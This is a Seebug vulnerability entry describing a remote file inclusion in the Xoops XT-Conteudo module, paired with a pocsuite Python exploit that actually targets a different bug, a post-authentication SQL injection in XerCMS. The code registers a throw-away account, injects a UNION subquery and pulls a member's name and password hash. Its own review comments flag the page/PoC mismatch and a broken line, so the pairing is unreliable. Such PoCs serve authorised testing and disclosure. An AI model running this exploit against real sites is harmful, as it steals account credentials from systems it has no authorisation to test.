Seebug SSV:1885

Xoops XT-Conteudo模块Spaw_Control.Class.PHP远程文件包含漏洞


Xoops XT-Conteudo是一款基于PHP的WEB应用程序。

Xoops XT-Conteudo不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。

问题是由于'spaw_control.class.php'脚本对用户提交的'spaw_root'参数缺少过滤,攻击者可以提交指向恶意远程服务器的URL作为包含对象(远程文件包含),从而以WEB进程权限执行任意PHP代码。

Xoops XT-Conteudo Module 1.52
目前没有详细解决方案提供:

<a href="http://www.xoops.org/" target="_blank">http://www.xoops.org/</a>


#!/usr/bin/env python
# coding: utf-8
import re
import os
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


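class TestPOC(POCBase):
    """pocsuite PoC: XerCMS 20150528 SQL injection in ``/?m=member&a=message``.

    Flow (see ``exploit``): register a throw-away member account, log in
    with it, then request ``?m=member&a=message&d=rely&id=<payload>``.  The
    ``id`` value is spliced into a SQL statement without quoting, so the
    suffix ``0 union select 0,(<subquery>)`` is evaluated server-side and its
    result is echoed back in the page (``_attack`` reads it out of the hidden
    ``message[uid]`` input).  The injection is therefore post-auth, but any
    self-registered member reaches it.

    Side effects on the target: every ``exploit`` call creates a new member
    account with random credentials; ``_attack`` additionally reads a row of
    ``xercms_member`` (name and password hash).  Only run against hosts you
    are authorised to test.

    NOTE(review): the metadata below (``name``/``appName``) says XerCMS,
    while the page this PoC sits on (SSV-1885) describes a Xoops XT-Conteudo
    remote file inclusion; the vulID/product pairing looks inconsistent and
    should be verified before this PoC is relied on.
    """
    vulID = '1885'  # vul ID
    version = '1'
    author = ['ricter']
    vulDate = '2015-06-01'
    createDate = '2015-06-01'
    updateDate = '2015-06-01'
    references = ['']
    name = 'XerCMS 20150528 /XerCMS/Modules/member/index.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.xercms.com/'
    appName = 'XerCMS'
    appVersion = '20150528'
    vulType = 'SQL Injection'
    desc = '''
        XerCMS 将用户传入的字符直接带入无单引号保护的 SQL 语句,导致 SQL 注入
        漏洞,可以获取管理员的账号密码,造成信息泄露。
    '''

    samples = ['']

    def random(self, length=5):
        """Return ``length`` lowercase hex characters drawn from ``os.urandom``.

        Used for the throw-away username/password/nick/email, so an
        OS-entropy source is deliberate: values must be unpredictable and
        unlikely to collide with existing accounts.  Iterating a
        ``bytearray`` yields ints on both Python 2 and 3; the original
        ``str.encode('hex')`` only exists on Python 2.
        """
        raw = bytearray(os.urandom(length))
        return ''.join('%02x' % b for b in raw)[:length]

    def exploit(self, payload):
        """Register, log in, then fetch the injection page with ``payload``.

        ``payload`` is a SQL expression spliced verbatim into the ``id``
        parameter as ``0 union select 0,(<payload>)`` — no quoting or
        encoding is added here, so it must already be valid for the target.

        Returns the raw body (``.content``) of the final GET.

        NOTE(review): no ``timeout`` is passed to the session calls, so an
        unresponsive target can block the run indefinitely; whether the
        pocsuite ``req`` wrapper accepts ``timeout=`` is not visible here.
        The register/login responses are not inspected, so a rejected
        registration only surfaces later as a failed verify.
        """
        base = self.url
        reg_url = '%s/?m=member&a=registerPost' % base
        login_url = '%s/?m=member&a=loginPost' % base
        exploit_url = (
            '%s/?m=member&a=message&d=rely&id=0 union select 0,(%s)'
            % (base, payload)
        )

        username = self.random()
        password = self.random(10)
        login_form = {
            'member[name]': username,
            'member[pass]': password,
        }
        register_form = dict(login_form)
        register_form.update({
            'member[pass2]': password,
            'member[nick]': self.random(),
            # NOTE(review): the source line reads '%[email protected]', which is
            # not a valid %-format (ValueError at runtime) and looks like an
            # e-mail obfuscation artefact; the intended domain is not
            # recoverable, so example.com is a placeholder — restore the
            # real one if the target validates e-mail domains.
            'member[email]': '%s@example.com' % self.random(),
        })

        session = req.Session()
        session.post(reg_url, data=register_form)
        session.post(login_url, data=login_form)
        return session.get(exploit_url).content

    def _attack(self):
        """Read one ``xercms_member`` row (``name::password``) via the injection.

        ``0x3a3a`` is the ``::`` separator the regex splits on; the response
        is expected to echo the concatenation inside the hidden
        ``message[uid]`` input.  ``limit 1`` with no ``order by`` returns
        whichever row the database yields first — the ``AdminInfo`` key is
        only accurate if that row really is the administrator, which nothing
        here checks.  Returns a pocsuite ``Output``.

        NOTE(review): the regex is a text pattern; if ``.content`` is bytes
        (Python 3) the search raises ``TypeError`` — this PoC appears to
        target the Python 2 pocsuite API.
        """
        result = {}
        response = self.exploit(
            'select concat(name,0x3a3a,pass)from xercms_member limit 1')
        # Raw string so the '\[' and '\w' escapes reach re unchanged.
        match = re.search(
            r'name="message\[uid\]" value="(?P<Username>.*?)::(?P<Password>\w{32})"',
            response)
        if match:
            result['AdminInfo'] = match.groupdict()
        return self.parse_attack(result)

    def _verify(self):
        """Non-destructive check: inject ``md5(24091293)`` and look for its digest.

        Finding the expected MD5 hex digest in the response proves the
        subquery executed server-side without touching application data
        (the throw-away account created by ``exploit`` still remains).
        Returns a pocsuite ``Output``.
        """
        result = {}
        response = self.exploit('md5(24091293)')
        if 'd55f9a6634498b197e64e134121405db' in response:
            result['VerifyInfo'] = {'URL': self.url}
        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in a pocsuite ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
            return output
        output.success(result)
        return output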


# Hand the PoC class to pocsuite's register() hook (imported above).
register(TestPOC)